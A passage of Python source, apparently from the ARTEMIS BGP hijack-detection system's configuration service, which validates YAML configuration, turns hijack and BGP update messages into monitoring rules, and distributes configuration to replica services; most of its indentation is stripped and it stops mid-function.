def parse(raw: Union[Text, TextIO, StringIO], yaml: Optional[bool] = False):
"""
Parser for the configuration file or string.
The format can either be a File, StringIO or String
"""
try:
if yaml:
data = ruamel.yaml.load(
raw, Loader=ruamel.yaml.RoundTripLoader, preserve_quotes=True
)
# update raw to keep correct format
raw = ruamel.yaml.dump(data, Dumper=ruamel.yaml.RoundTripDumper)
else:
data = raw
data = check(data)
data["timestamp"] = time.time()
        # if raw is a string we save it as-is, else we get the StringIO value.
if isinstance(raw, str):
data["raw_config"] = raw
else:
data["raw_config"] = raw.getvalue()
return data, True, None
except Exception as e:
log.exception("exception")
return {"timestamp": time.time()}, False, str(e)
def check(data: Text) -> Dict:
"""
Checks if all sections and fields are defined correctly
in the parsed configuration.
Raises custom exceptions in case a field or section
is misdefined.
"""
if data is None or not isinstance(data, dict):
raise ArtemisError("invalid-data", type(data))
sections = {"prefixes", "asns", "monitors", "rules", "autoignore"}
for section in data:
if section not in sections:
raise ArtemisError("invalid-section", section)
data["prefixes"] = {k: flatten(v) for k, v in data.get("prefixes", {}).items()}
data["asns"] = {k: flatten(v) for k, v in data.get("asns", {}).items()}
data["monitors"] = data.get("monitors", {})
data["rules"] = data.get("rules", [])
data["autoignore"] = data.get("autoignore", {})
check_prefixes(data["prefixes"])
check_monitors(data["monitors"])
check_asns(data["asns"])
check_rules(data["rules"])
check_autoignore(data["autoignore"])
return data
def check_prefixes(_prefixes):
for prefix_group, prefixes in _prefixes.items():
for prefix in prefixes:
if translate_rfc2622(prefix, just_match=True):
continue
try:
str2ip(prefix)
except Exception:
raise ArtemisError("invalid-prefix", prefix)
def check_asns(_asns):
for name, asns in _asns.items():
for asn in asns:
if translate_asn_range(asn, just_match=True):
continue
if not isinstance(asn, int):
raise ArtemisError("invalid-asn", asn)
def check_rules(_rules):
rule_supported_fields = {
"prefixes",
"policies",
"origin_asns",
"neighbors",
"prepend_seq",
"mitigation",
"community_annotations",
}
for rule in _rules:
for field in rule:
if field not in rule_supported_fields:
log.warning("unsupported field found {} in {}".format(field, rule))
rule["prefixes"] = flatten(rule["prefixes"])
for prefix in rule["prefixes"]:
if translate_rfc2622(prefix, just_match=True):
continue
try:
str2ip(prefix)
except Exception:
raise ArtemisError("invalid-prefix", prefix)
rule["origin_asns"] = flatten(rule.get("origin_asns", []))
if rule["origin_asns"] == ["*"]:
rule["origin_asns"] = [-1]
if "neighbors" in rule and "prepend_seq" in rule:
raise ArtemisError("neighbors-prepend_seq-mutually-exclusive", "")
rule["neighbors"] = flatten(rule.get("neighbors", []))
if rule["neighbors"] == ["*"]:
rule["neighbors"] = [-1]
rule["prepend_seq"] = list(map(flatten, rule.get("prepend_seq", [])))
rule["mitigation"] = flatten(rule.get("mitigation", "manual"))
rule["policies"] = flatten(rule.get("policies", []))
rule["community_annotations"] = rule.get("community_annotations", [])
if not isinstance(rule["community_annotations"], list):
raise ArtemisError("invalid-outer-list-comm-annotations", "")
seen_community_annotations = set()
for annotation_entry_outer in rule["community_annotations"]:
if not isinstance(annotation_entry_outer, dict):
raise ArtemisError("invalid-dict-comm-annotations", "")
for annotation in annotation_entry_outer:
if annotation in seen_community_annotations:
raise ArtemisError("duplicate-community-annotation", annotation)
seen_community_annotations.add(annotation)
if not isinstance(annotation_entry_outer[annotation], list):
raise ArtemisError(
"invalid-inner-list-comm-annotations", annotation
)
for annotation_entry_inner in annotation_entry_outer[annotation]:
for key in annotation_entry_inner:
if key not in ["in", "out"]:
raise ArtemisError("invalid-community-annotation-key", key)
in_communities = flatten(annotation_entry_inner.get("in", []))
for community in in_communities:
if not re.match(r"\d+\:\d+", community):
raise ArtemisError("invalid-bgp-community", community)
out_communities = flatten(annotation_entry_inner.get("out", []))
for community in out_communities:
if not re.match(r"\d+\:\d+", community):
raise ArtemisError("invalid-bgp-community", community)
for asn in rule["origin_asns"] + rule["neighbors"]:
if translate_asn_range(asn, just_match=True):
continue
if not isinstance(asn, int):
raise ArtemisError("invalid-asn", asn)
def check_monitors(_monitors):
supported_monitors = {
"riperis",
"exabgp",
"bgpstreamhist",
"bgpstreamlive",
"bgpstreamkafka",
}
available_ris = {
"rrc01",
"rrc02",
"rrc03",
"rrc04",
"rrc05",
"rrc06",
"rrc07",
"rrc08",
"rrc09",
"rrc10",
"rrc11",
"rrc12",
"rrc13",
"rrc14",
"rrc15",
"rrc16",
"rrc17",
"rrc18",
"rrc19",
"rrc20",
"rrc21",
"rrc22",
"rrc23",
"rrc00",
}
available_bgpstreamlive = {"routeviews", "ris", "caida"}
required_bgpstreamkafka = {"host", "port", "topic"}
for key, info in _monitors.items():
if key not in supported_monitors:
raise ArtemisError("invalid-monitor", key)
elif key == "riperis":
if info == [""]:
continue
for unavailable in set(info).difference(available_ris):
log.warning("unavailable monitor {}".format(unavailable))
elif key == "bgpstreamlive":
if not info or not set(info).issubset(available_bgpstreamlive):
raise ArtemisError("invalid-bgpstreamlive-project", info)
elif key == "bgpstreamkafka":
if not set(info.keys()).issubset(required_bgpstreamkafka):
raise ArtemisError(
"invalid-bgpstreamkakfa-configuration", list(info.keys())
)
elif key == "exabgp":
for entry in info:
if "ip" not in entry and "port" not in entry:
raise ArtemisError("invalid-exabgp-info", entry)
# container service IPs will start as follows
if not entry["ip"].startswith("exabgp"):
try:
str2ip(entry["ip"])
except Exception:
raise ArtemisError("invalid-exabgp-ip", entry["ip"])
if not isinstance(entry["port"], int):
raise ArtemisError("invalid-exabgp-port", entry["port"])
if "autoconf" in entry:
if entry["autoconf"] == "true":
entry["autoconf"] = True
elif entry["autoconf"] == "false":
del entry["autoconf"]
else:
raise ArtemisError(
"invalid-exabgp-autoconf-flag", entry["autoconf"]
)
if "learn_neighbors" in entry:
if "autoconf" not in entry:
raise ArtemisError(
"invalid-exabgp-missing-autoconf-for-learn_neighbors",
entry["learn_neighbors"],
)
if entry["learn_neighbors"] == "true":
entry["learn_neighbors"] = True
elif entry["learn_neighbors"] == "false":
del entry["learn_neighbors"]
else:
raise ArtemisError(
"invalid-exabgp-learn_neighbors-flag",
entry["learn_neighbors"],
)
elif key == "bgpstreamhist":
if not isinstance(info, str) or not os.path.exists(info):
raise ArtemisError("invalid-bgpstreamhist-dir", info)
def check_autoignore(_autoignore_rules):
autoignore_supported_fields = {
"thres_num_peers_seen",
"thres_num_ases_infected",
"interval",
"prefixes",
}
for rule_key, rule in _autoignore_rules.items():
for field in rule:
if field not in autoignore_supported_fields:
log.warning("unsupported field found {} in {}".format(field, rule))
if "prefixes" not in rule:
raise ArtemisError("no-prefixes-in-autoignore-rule", rule_key)
rule["prefixes"] = flatten(rule["prefixes"])
for prefix in rule["prefixes"]:
if translate_rfc2622(prefix, just_match=True):
continue
try:
str2ip(prefix)
except Exception:
raise ArtemisError("invalid-prefix", prefix)
field = None
try:
for field in [
"thres_num_peers_seen",
"thres_num_ases_infected",
"interval",
]:
rule[field] = int(rule.get(field, 0))
except Exception:
raise ArtemisError("invalid-value-for-{}".format(field), rule.get(field, 0))
def translate_learn_rule_msg_to_dicts(raw):
"""
Translates a learn rule message payload (raw)
into ARTEMIS-compatible dictionaries
:param raw: {
"key": <str>,
"prefix": <str>,
"type": <str>,
"hijack_as": <int>,
}
:return: (<dict>rule_prefix, <dict>rule_asns,
<list><dict>rules)
"""
# initialize dictionaries and lists
rule_prefix = {}
rule_asns = {}
rules = []
try:
# retrieve (origin, neighbor) combinations from redis
redis_hijack_key = redis_key(raw["prefix"], raw["hijack_as"], raw["type"])
hij_orig_neighb_set = "hij_orig_neighb_{}".format(redis_hijack_key)
orig_to_neighb = {}
neighb_to_origs = {}
asns = set()
redis_conn = redis.Redis(host=REDIS_HOST, port=REDIS_PORT)
ping_redis(redis_conn)
if redis_conn.exists(hij_orig_neighb_set):
for element in redis_conn.sscan_iter(hij_orig_neighb_set):
(origin_str, neighbor_str) = element.decode("utf-8").split("_")
origin = None
if origin_str != "None":
origin = int(origin_str)
neighbor = None
if neighbor_str != "None":
neighbor = int(neighbor_str)
if origin is not None:
asns.add(origin)
if origin not in orig_to_neighb:
orig_to_neighb[origin] = set()
if neighbor is not None:
asns.add(neighbor)
orig_to_neighb[origin].add(neighbor)
if neighbor not in neighb_to_origs:
neighb_to_origs[neighbor] = set()
neighb_to_origs[neighbor].add(origin)
# learned rule prefix
rule_prefix = {
raw["prefix"]: "LEARNED_H_{}_P_{}".format(
raw["key"],
raw["prefix"].replace("/", "_").replace(".", "_").replace(":", "_"),
)
}
# learned rule asns
rule_asns = {}
for asn in sorted(list(asns)):
rule_asns[asn] = "LEARNED_H_{}_AS_{}".format(raw["key"], asn)
# learned rule(s)
if re.match(r"^[E|S]\|0.*", raw["type"]):
assert len(orig_to_neighb) == 1
assert raw["hijack_as"] in orig_to_neighb
learned_rule = {
"prefixes": [rule_prefix[raw["prefix"]]],
"origin_asns": [rule_asns[raw["hijack_as"]]],
"neighbors": [
rule_asns[asn] for asn in sorted(orig_to_neighb[raw["hijack_as"]])
],
"mitigation": "manual",
}
rules.append(learned_rule)
elif re.match(r"^[E|S]\|1.*", raw["type"]):
assert len(neighb_to_origs) == 1
assert raw["hijack_as"] in neighb_to_origs
learned_rule = {
"prefixes": [rule_prefix[raw["prefix"]]],
"origin_asns": [
rule_asns[asn] for asn in sorted(neighb_to_origs[raw["hijack_as"]])
],
"neighbors": [rule_asns[raw["hijack_as"]]],
"mitigation": "manual",
}
rules.append(learned_rule)
elif re.match(r"^[E|S]\|-.*", raw["type"]) or re.match(r"^Q\|0.*", raw["type"]):
for origin in sorted(orig_to_neighb):
learned_rule = {
"prefixes": [rule_prefix[raw["prefix"]]],
"origin_asns": [rule_asns[origin]],
"neighbors": [
rule_asns[asn] for asn in sorted(orig_to_neighb[origin])
],
"mitigation": "manual",
}
rules.append(learned_rule)
except Exception:
log.exception("{}".format(raw))
return None, None, None
return rule_prefix, rule_asns, rules
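# Illustrative sketch (hypothetical payload): a learn-rule message of the
# shape consumed above, e.g. for an exact-prefix, type-0 (origin) hijack of
# 10.0.0.0/24 by AS 65001. Given matching (origin, neighbor) state in redis,
# the function would return a prefix anchor like
# "LEARNED_H_abc123_P_10_0_0_0_24", ASN anchors like
# "LEARNED_H_abc123_AS_65001", and rule dicts referencing those anchors.
_EXAMPLE_LEARN_RULE_MSG = {
    "key": "abc123",
    "prefix": "10.0.0.0/24",
    "type": "E|0|-|-",
    "hijack_as": 65001,
}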
def translate_bgp_update_to_dicts(bgp_update, learn_neighbors=False):
"""
Translates a BGP update message payload
into ARTEMIS-compatible dictionaries
:param learn_neighbors: <boolean> to determine if we should learn neighbors out of this update
:param bgp_update: {
"prefix": <str>,
"key": <str>,
"peer_asn": <int>,
"path": (<int>)<list>
"service": <str>,
"type": <str>,
"communities": [
...,
{
"asn": <int>,
"value": <int>
},
...,
],
"timestamp": <float>
}
:return: (<dict>rule_prefix, <dict>rule_asns,
<list><dict>rules)
"""
# initialize dictionaries and lists
rule_prefix = {}
rule_asns = {}
rules = []
try:
if bgp_update["type"] == "A":
# learned rule prefix
rule_prefix = {
bgp_update["prefix"]: "AUTOCONF_P_{}".format(
bgp_update["prefix"]
.replace("/", "_")
.replace(".", "_")
.replace(":", "_")
)
}
# learned rule asns
as_path = bgp_update["path"]
origin_asn = None
neighbor = None
asns = set()
if as_path:
origin_asn = as_path[-1]
asns.add(origin_asn)
neighbors = set()
if "communities" in bgp_update and learn_neighbors:
for community in bgp_update["communities"]:
asn = int(community["asn"])
value = int(community["value"])
if asn == origin_asn and value != origin_asn:
neighbors.add(value)
for neighbor in neighbors:
asns.add(neighbor)
rule_asns = {}
for asn in sorted(list(asns)):
rule_asns[asn] = "AUTOCONF_AS_{}".format(asn)
# learned rule
learned_rule = {
"prefixes": [rule_prefix[bgp_update["prefix"]]],
"origin_asns": [rule_asns[origin_asn]],
"mitigation": "manual",
}
if neighbors:
learned_rule["neighbors"] = []
for neighbor in neighbors:
learned_rule["neighbors"].append(rule_asns[neighbor])
rules.append(learned_rule)
else:
# learned rule prefix
rule_prefix = {
bgp_update["prefix"]: "AUTOCONF_P_{}".format(
bgp_update["prefix"]
.replace("/", "_")
.replace(".", "_")
.replace(":", "_")
)
}
except Exception:
log.exception("{}".format(bgp_update))
return None, None, None
return rule_prefix, rule_asns, rules
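# Illustrative sketch (hypothetical update): an announcement that the function
# above would translate into AUTOCONF_P_*/AUTOCONF_AS_* anchors; with
# learn_neighbors=True, communities tagged with the origin ASN (65001) are
# additionally read as neighbor ASNs (here: 65002).
_EXAMPLE_AUTOCONF_UPDATE = {
    "prefix": "192.0.2.0/24",
    "key": "update-key-1",
    "peer_asn": 65010,
    "path": [65010, 65002, 65001],
    "service": "exabgp|exabgp-monitor|5000",
    "type": "A",
    "communities": [{"asn": 65001, "value": 65002}],
    "timestamp": 0.0,
}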
def get_existing_rules_from_new_rule(yaml_conf, rule_prefix, rule_asns, rule):
try:
# calculate origin asns for the new rule (int format)
new_rule_origin_asns = set()
for origin_asn_anchor in rule["origin_asns"]:
# translate origin asn anchor into integer for quick retrieval
origin_asn = None
for asn in rule_asns:
if rule_asns[asn] == origin_asn_anchor:
origin_asn = asn
break
if origin_asn:
new_rule_origin_asns.add(origin_asn)
# calculate neighbors for the new rule (int format)
new_rule_neighbors = set()
if "neighbors" in rule and rule["neighbors"]:
for neighbor_anchor in rule["neighbors"]:
# translate neighbor anchor into integer for quick retrieval
neighbor = None
for asn in rule_asns:
if rule_asns[asn] == neighbor_anchor:
neighbor = asn
break
if neighbor:
new_rule_neighbors.add(neighbor)
# check existence of rule (by checking the affected prefixes, origin_asns, and neighbors)
existing_rules_found = set()
rule_extension_needed = set()
if "rules" not in yaml_conf:
yaml_conf["rules"] = ruamel.yaml.comments.CommentedSeq()
for i, existing_rule in enumerate(yaml_conf["rules"]):
existing_rule_prefixes = set()
for existing_prefix_seq in existing_rule["prefixes"]:
if isinstance(existing_prefix_seq, str):
existing_rule_prefixes.add(existing_prefix_seq)
continue
for existing_prefix in existing_prefix_seq:
existing_rule_prefixes.add(existing_prefix)
if set(rule_prefix.keys()) == existing_rule_prefixes:
# same prefixes, proceed to origin asn checking
# calculate the origin asns of the existing rule
existing_origin_asns = set()
if "origin_asns" in existing_rule:
for existing_origin_asn_seq in existing_rule["origin_asns"]:
if existing_origin_asn_seq:
if isinstance(existing_origin_asn_seq, int):
existing_origin_asns.add(existing_origin_asn_seq)
continue
for existing_origin_asn in existing_origin_asn_seq:
if existing_origin_asn != -1:
existing_origin_asns.add(existing_origin_asn)
if new_rule_origin_asns == existing_origin_asns:
# same prefixes, proceed to neighbor checking
# calculate the neighbors of the existing rule
existing_neighbors = set()
if "neighbors" in existing_rule:
for existing_neighbor_seq in existing_rule["neighbors"]:
if existing_neighbor_seq:
if isinstance(existing_neighbor_seq, int):
existing_neighbors.add(existing_neighbor_seq)
continue
for existing_neighbor in existing_neighbor_seq:
if existing_neighbor != -1:
existing_neighbors.add(existing_neighbor)
if new_rule_neighbors == existing_neighbors:
# existing rule found, do nothing
existing_rules_found.add(i)
elif not existing_neighbors:
existing_rules_found.add(i)
# rule extension needed if wildcarded neighbors
rule_extension_needed.add(i)
except Exception:
log.exception("exception")
return set(), set()
return existing_rules_found, rule_extension_needed
def get_created_prefix_anchors_from_new_rule(yaml_conf, rule_prefix):
created_prefix_anchors = set()
all_prefixes_exist = True
try:
for prefix in rule_prefix:
prefix_anchor = rule_prefix[prefix]
if "prefixes" not in yaml_conf:
yaml_conf["prefixes"] = ruamel.yaml.comments.CommentedMap()
if prefix_anchor not in yaml_conf["prefixes"]:
all_prefixes_exist = False
yaml_conf["prefixes"][
prefix_anchor
] = ruamel.yaml.comments.CommentedSeq()
yaml_conf["prefixes"][prefix_anchor].append(prefix)
created_prefix_anchors.add(prefix_anchor)
yaml_conf["prefixes"][prefix_anchor].yaml_set_anchor(
prefix_anchor, always_dump=True
)
except Exception:
log.exception("exception")
return set(), False
return created_prefix_anchors, all_prefixes_exist
def get_created_asn_anchors_from_new_rule(yaml_conf, rule_asns):
created_asn_anchors = set()
all_asns_exist = True
try:
for asn in sorted(rule_asns):
asn_anchor = rule_asns[asn]
if "asns" not in yaml_conf:
yaml_conf["asns"] = ruamel.yaml.comments.CommentedMap()
if asn_anchor not in yaml_conf["asns"]:
all_asns_exist = False
yaml_conf["asns"][asn_anchor] = ruamel.yaml.comments.CommentedSeq()
yaml_conf["asns"][asn_anchor].append(asn)
created_asn_anchors.add(asn_anchor)
yaml_conf["asns"][asn_anchor].yaml_set_anchor(asn_anchor, always_dump=True)
except Exception:
log.exception("exception")
return set(), False
return created_asn_anchors, all_asns_exist
def post_configuration_to_other_services(
shared_memory_manager_dict, services=ALL_CONFIGURABLE_SERVICES
):
data = shared_memory_manager_dict["config_data"]
local_ip = get_local_ip()
same_service_only = False
if services == [SERVICE_NAME]:
same_service_only = True
for service in services:
try:
if IS_KUBERNETES:
ips_and_replicas = service_to_ips_and_replicas_in_k8s(service)
else:
ips_and_replicas = service_to_ips_and_replicas_in_compose(
SERVICE_NAME, service
)
except Exception:
log.error("could not resolve service '{}'".format(service))
continue
for replica_name, replica_ip in ips_and_replicas:
try:
# same service (configuration)
if service == SERVICE_NAME:
# do not send the configuration to yourself
if replica_ip == local_ip:
continue
# check if you need to inform the other microservice about the fileobserver ignoring state
ignore_fileobserver = shared_memory_manager_dict[
"ignore_fileobserver"
]
# no need to update data, just notify about fileobserver ignore state
if same_service_only:
r = requests.post(
url="http://{}:{}/config".format(replica_ip, REST_PORT),
data=json.dumps(
{"data": {}, "ignore_fileobserver": ignore_fileobserver}
),
)
else:
r = requests.post(
url="http://{}:{}/config".format(replica_ip, REST_PORT),
data=json.dumps(
{
"data": data,
"ignore_fileobserver": ignore_fileobserver,
}
),
)
else:
r = requests.post(
url="http://{}:{}/config".format(replica_ip, REST_PORT),
data=json.dumps(data),
)
response = r.json()
assert response["success"]
except Exception:
log.error("could not configure service '{}'".format(replica_name))
def write_conf_via_tmp_file(config_file, tmp_file, conf, yaml=True) -> None:
if IS_KUBERNETES:
return
try:
with open(tmp_file, "w") as f:
if yaml:
ruamel.yaml.dump(conf, f, Dumper=ruamel.yaml.RoundTripDumper)
else:
f.write(conf)
shutil.copymode(config_file, tmp_file)
st = os.stat(config_file)
os.chown(tmp_file, st[stat.ST_UID], st[stat.ST_GID])
os.rename(tmp_file, config_file)
except Exception:
log.exception("exception")
def translate_learn_rule_dicts_to_yaml_conf(
yaml_conf, rule_prefix, rule_asns, rules, withdrawal=False
):
"""
Translates the dicts from translate_learn_rule_msg_to_dicts
function into yaml configuration,
preserving the order and comments of the current file
(edits the yaml_conf in-place)
:param yaml_conf: <dict>
:param rule_prefix: <dict> mapping each prefix to its anchor name
:param rule_asns: <dict> mapping each ASN to its anchor name
:param rules: <list><dict>
:param withdrawal: <bool>
:return: (<str>, <bool>)
"""
if (withdrawal and not rule_prefix) or (
not withdrawal and (not rule_prefix or not rule_asns or not rules)
):
return "problem with rule installation", False
try:
if rule_prefix and withdrawal:
rules_to_be_deleted = []
for existing_rule in yaml_conf["rules"]:
prefix_seqs_to_be_deleted = []
for existing_prefix_seq in existing_rule["prefixes"]:
if isinstance(existing_prefix_seq, str):
for prefix in rule_prefix:
if existing_prefix_seq == prefix:
prefix_seqs_to_be_deleted.append(existing_prefix_seq)
break
continue
for existing_prefix in existing_prefix_seq:
for prefix in rule_prefix:
if existing_prefix == prefix:
prefix_seqs_to_be_deleted.append(existing_prefix_seq)
break
if len(prefix_seqs_to_be_deleted) == len(existing_rule["prefixes"]):
# same prefixes, rule needs to be deleted
rules_to_be_deleted.append(existing_rule)
elif prefix_seqs_to_be_deleted:
# only the rule prefix(es) need to be deleted
for prefix_seq in prefix_seqs_to_be_deleted:
existing_rule["prefixes"].remove(prefix_seq)
for rule in rules_to_be_deleted:
yaml_conf["rules"].remove(rule)
for prefix_anchor in rule_prefix.values():
if prefix_anchor in yaml_conf["prefixes"]:
del yaml_conf["prefixes"][prefix_anchor]
return "ok", True
# create prefix anchors
created_prefix_anchors, prefixes_exist = get_created_prefix_anchors_from_new_rule(
yaml_conf, rule_prefix
)
# create asn anchors
created_asn_anchors, asns_exist = get_created_asn_anchors_from_new_rule(
yaml_conf, rule_asns
)
# append rules
for rule in rules:
# declare new rules directly for non-existent prefixes (optimization)
if prefixes_exist:
(
existing_rules_found,
rule_update_needed,
) = get_existing_rules_from_new_rule(
yaml_conf, rule_prefix, rule_asns, rule
)
else:
existing_rules_found = []
rule_update_needed = False
# if no existing rule, make a new one
if not existing_rules_found:
rule_map = ruamel.yaml.comments.CommentedMap()
# append prefix
rule_map["prefixes"] = ruamel.yaml.comments.CommentedSeq()
for prefix in rule["prefixes"]:
rule_map["prefixes"].append(yaml_conf["prefixes"][prefix])
# append origin asns
rule_map["origin_asns"] = ruamel.yaml.comments.CommentedSeq()
for origin_asn_anchor in rule["origin_asns"]:
rule_map["origin_asns"].append(yaml_conf["asns"][origin_asn_anchor])
# append neighbors
rule_map["neighbors"] = ruamel.yaml.comments.CommentedSeq()
if "neighbors" in rule and rule["neighbors"]:
for neighbor_anchor in rule["neighbors"]:
rule_map["neighbors"].append(yaml_conf["asns"][neighbor_anchor])
else:
del rule_map["neighbors"]
# append mitigation action
rule_map["mitigation"] = rule["mitigation"]
yaml_conf["rules"].append(rule_map)
# else delete any created anchors (not needed), as long as no rule update is needed
elif not rule_update_needed:
for prefix_anchor in created_prefix_anchors:
del yaml_conf["prefixes"][prefix_anchor]
for asn_anchor in created_asn_anchors:
del yaml_conf["asns"][asn_anchor]
# rule update needed (neighbors)
else:
for existing_rule_found in existing_rules_found:
rule_map = yaml_conf["rules"][existing_rule_found]
if "neighbors" in rule and rule["neighbors"]:
if existing_rule_found in rule_update_needed:
rule_map["neighbors"] = ruamel.yaml.comments.CommentedSeq()
for neighbor_anchor in rule["neighbors"]:
rule_map["neighbors"].append(
yaml_conf["asns"][neighbor_anchor]
)
except Exception:
log.exception("{}-{}-{}".format(rule_prefix, rule_asns, rules))
return (
"problem with rule installation; exception during yaml processing",
False,
)
return "ok", True
class LoadAsSetsHandler(RequestHandler):
"""
REST request handler for loading AS sets.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Receives a "load-as-sets" message, translates the corresponding
AS-SET anchors into member ASN lists, and rewrites the configuration
:return:
"""
ret_json = {}
try:
(conf_key, yaml_conf) = read_conf(
load_yaml=True,
config_file=self.shared_memory_manager_dict["config_file"],
)
error = False
done_as_set_translations = {}
if "asns" in yaml_conf:
for name in yaml_conf["asns"]:
as_members = []
# consult cache
if name in done_as_set_translations:
as_members = done_as_set_translations[name]
# else try to retrieve from API
elif translate_as_set(name, just_match=True):
ret_dict = translate_as_set(name, just_match=False)
if ret_dict["success"] and "as_members" in ret_dict["payload"]:
as_members = ret_dict["payload"]["as_members"]
done_as_set_translations[name] = as_members
else:
error = ret_dict["error"]
break
if as_members:
new_as_set_cseq = ruamel.yaml.comments.CommentedSeq()
for asn in as_members:
new_as_set_cseq.append(asn)
new_as_set_cseq.yaml_set_anchor(name)
update_aliased_list(
yaml_conf, yaml_conf["asns"][name], new_as_set_cseq
)
if error:
ret_json = {"success": False, "payload": {}, "error": error}
elif done_as_set_translations:
ret_json = {
"success": True,
"payload": {
"message": "All ({}) AS-SET translations done".format(
len(done_as_set_translations)
)
},
"error": False,
}
else:
ret_json = {
"success": True,
"payload": {"message": "No AS-SET translations were needed"},
"error": False,
}
# as-sets were resolved, update configuration
if (not error) and done_as_set_translations:
configure_configuration(
{
"type": "yaml",
"content": ruamel.yaml.dump(
yaml_conf, Dumper=ruamel.yaml.RoundTripDumper
),
},
self.shared_memory_manager_dict,
)
except Exception:
log.exception("exception")
ret_json = {"success": False, "payload": {}, "error": "unknown"}
finally:
self.write(ret_json)
class HijackLearnRuleHandler(RequestHandler):
"""
REST request handler for learning hijack rules.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def post(self):
"""
Receives a "learn-rule" message, translates this
to the associated ARTEMIS-compatible dictionaries,
and adds the prefix, asns and rule(s) to the configuration
:param message: {
"key": <str>,
"prefix": <str>,
"type": <str>,
"hijack_as": <int>,
"action": <str> show|approve
}
:return: -
"""
payload = json.loads(self.request.body)
log.debug("payload: {}".format(payload))
ok = False
yaml_conf_str = ""
try:
# load initial YAML configuration
(conf_key, yaml_conf) = read_conf(
load_yaml=True,
config_file=self.shared_memory_manager_dict["config_file"],
)
# translate the BGP update information into ARTEMIS conf primitives
(rule_prefix, rule_asns, rules) = translate_learn_rule_msg_to_dicts(payload)
# create the actual ARTEMIS configuration (use copy in case the conf creation fails)
yaml_conf_clone = copy.deepcopy(yaml_conf)
msg, ok = translate_learn_rule_dicts_to_yaml_conf(
yaml_conf_clone, rule_prefix, rule_asns, rules
)
if ok:
# update running configuration
yaml_conf = copy.deepcopy(yaml_conf_clone)
yaml_conf_str = ruamel.yaml.dump(
yaml_conf, Dumper=ruamel.yaml.RoundTripDumper
)
else:
yaml_conf_str = msg
if payload["action"] == "approve" and ok:
# update configuration
configure_configuration(
{
"type": "yaml",
"content": ruamel.yaml.dump(
yaml_conf, Dumper=ruamel.yaml.RoundTripDumper
),
},
self.shared_memory_manager_dict,
)
except Exception:
log.exception("exception")
ok = False
finally:
# reply back to the sender with the extra yaml configuration
# message.
self.write({"success": ok, "new_yaml_conf": yaml_conf_str})
def configure_configuration(msg, shared_memory_manager_dict):
ret_json = {}
# ignore file observer if this is a change that we expect and do not need to re-consider
if "origin" in msg and msg["origin"] == "fileobserver":
shared_memory_locks["ignore_fileobserver"].acquire()
# re-instate fileobserver ignoring state to no-ignore
if shared_memory_manager_dict["ignore_fileobserver"]:
shared_memory_manager_dict["ignore_fileobserver"] = False
ret_json = {"success": True, "message": "ignored"}
shared_memory_locks["ignore_fileobserver"].release()
# configure the other configuration service replicas with the current config
# and the new ignore file observer info
post_configuration_to_other_services(
shared_memory_manager_dict, services=[SERVICE_NAME]
)
return ret_json
shared_memory_locks["ignore_fileobserver"].release()
shared_memory_locks["config_data"].acquire()
try:
# other configuration replica sends the correct data directly
if "data" in msg:
if msg["data"]:
shared_memory_manager_dict["config_data"] = msg["data"]
# update data hashes
shared_memory_manager_dict["section_hashes"] = {
"prefixes": get_hash(
shared_memory_manager_dict["config_data"]["prefixes"]
),
"asns": get_hash(shared_memory_manager_dict["config_data"]["asns"]),
"monitors": get_hash(
shared_memory_manager_dict["config_data"]["monitors"]
),
"rules": get_hash(
shared_memory_manager_dict["config_data"]["rules"]
),
"autoignore": get_hash(
shared_memory_manager_dict["config_data"]["autoignore"]
),
}
if "ignore_fileobserver" in msg:
shared_memory_locks["ignore_fileobserver"].acquire()
shared_memory_manager_dict["ignore_fileobserver"] = msg[
"ignore_fileobserver"
]
shared_memory_locks["ignore_fileobserver"].release()
ret_json = {"success": True, "message": "configured"}
else:
type_ = msg["type"]
raw_ = msg["content"]
# if received config from Frontend with comment
comment = None
if isinstance(raw_, dict) and "comment" in raw_:
comment = raw_["comment"]
del raw_["comment"]
raw = list(map(lambda x: x + "\n", raw_["config"].split("\n")))
else:
raw = raw_
if type_ == "yaml":
# the content is provided as a list of YAML lines so we have to join first
stream = StringIO("".join(raw))
data, _flag, _error = parse(stream, yaml=True)
else:
data, _flag, _error = parse(raw)
# _flag is True or False depending on whether the new configuration
# was accepted or not.
if _flag:
log.debug("accepted new configuration")
data_differ = False
# get previous conf key/hash and compare
(conf_key, yaml_conf) = read_conf(load_yaml=False, config_file=None)
if conf_key:
new_config_hash = get_hash(data["raw_config"])
if new_config_hash != conf_key:
data_differ = True
else:
# as fallback, compare current with previous data excluding --obviously-- timestamps
prev_data = copy.deepcopy(shared_memory_manager_dict["config_data"])
del prev_data["timestamp"]
new_data = copy.deepcopy(data)
del new_data["timestamp"]
prev_data_str = json.dumps(prev_data, sort_keys=True)
new_data_str = json.dumps(new_data, sort_keys=True)
if prev_data_str != new_data_str:
data_differ = True
if data_differ:
shared_memory_manager_dict["config_data"] = data
if comment:
shared_memory_manager_dict["config_data"]["comment"] = comment
# if the change did not come from the file observer itself,
# we ignore the file observer next changes (until it informs us again)
if not ("origin" in msg and msg["origin"] == "fileobserver"):
shared_memory_locks["ignore_fileobserver"].acquire()
shared_memory_manager_dict["ignore_fileobserver"] = True
shared_memory_locks["ignore_fileobserver"].release()
# calculate new data hashes, and compare them with stored ones
new_section_hashes = {
"prefixes": get_hash(
shared_memory_manager_dict["config_data"]["prefixes"]
),
"asns": get_hash(
shared_memory_manager_dict["config_data"]["asns"]
),
"monitors": get_hash(
shared_memory_manager_dict["config_data"]["monitors"]
),
"rules": get_hash(
shared_memory_manager_dict["config_data"]["rules"]
),
"autoignore": get_hash(
shared_memory_manager_dict["config_data"]["autoignore"]
),
}
difference_booleans = {}
for section in new_section_hashes:
difference_booleans[section] = (
new_section_hashes[section]
!= shared_memory_manager_dict["section_hashes"][section]
)
# update data hashes
shared_memory_manager_dict["section_hashes"] = {
"prefixes": new_section_hashes["prefixes"],
"asns": new_section_hashes["asns"],
"monitors": new_section_hashes["monitors"],
"rules": new_section_hashes["rules"],
"autoignore": new_section_hashes["autoignore"],
}
# by default notify configuration replicas in any case
services_to_notify = [SERVICE_NAME]
# if rules changes, notify everyone
if difference_booleans["rules"]:
services_to_notify = ALL_CONFIGURABLE_SERVICES
# if autoignore changes, notify prefixtree, database and autoignore
if difference_booleans["autoignore"]:
for service in [
PREFIXTREE_HOST,
DATABASE_HOST,
AUTOIGNORE_HOST,
]:
if service not in services_to_notify:
services_to_notify.append(service)
# if database not already scheduled to notify at this stage, append it
if DATABASE_HOST not in services_to_notify:
services_to_notify.append(DATABASE_HOST)
